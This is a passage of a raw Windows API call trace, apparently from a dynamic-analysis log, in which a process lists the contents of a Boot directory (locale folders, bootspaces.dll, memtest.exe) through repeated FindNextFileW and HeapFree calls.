hFindFile=0x6ba170, lpFindFileData=0x3b3fcf8 | out: lpFindFileData=0x3b3fcf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77850000, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0157.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.411] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef4e6d79, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef4e6d79, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x175a0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="bootspaces.dll", cAlternateFileName="BOOTSP~1.DLL")) returned 1 [0157.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.411] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="da-DK", cAlternateFileName="")) returned 1 [0157.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.411] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="de-DE", cAlternateFileName="")) returned 1 [0157.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.412] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="el-GR", cAlternateFileName="")) returned 1 [0157.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.412] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="en-GB", cAlternateFileName="")) returned 1 [0157.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.412] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="en-US", cAlternateFileName="")) returned 1 [0157.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.413] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="es-ES", cAlternateFileName="")) returned 1 [0157.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.413] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="es-MX", cAlternateFileName="")) returned 1 [0157.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.413] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="et-EE", cAlternateFileName="")) returned 1 [0157.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.414] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0157.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.414] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Fonts", cAlternateFileName="")) returned 1 [0157.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.415] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="fr-CA", cAlternateFileName="")) returned 1 [0157.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.415] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0157.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.416] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0157.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.416] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0157.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.416] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="it-IT", cAlternateFileName="")) returned 1 [0157.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.417] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0157.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.417] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0157.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.417] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0157.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.417] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0157.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.418] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6196d8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbcf473f, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xc63a0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0157.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.418] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0157.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.418] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0157.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.419] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0157.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.419] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0157.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.420] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="qps-ploc", cAlternateFileName="")) returned 1 [0157.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.420] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0157.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0157.421] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0157.421] FindClose (in: hFindFile=0x728288 | out: hFindFile=0x728288) returned 1 [0157.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.421] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0157.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.421] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0157.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.422] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0157.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.422] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0157.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.422] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0x5168548b, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0157.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.423] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~2")) returned 1 [0157.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.423] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01adf43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6a2250, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0157.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.423] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206504, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6b5aca, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0157.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.423] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206a30, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0157.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.424] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef6c9427, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef6c9427, 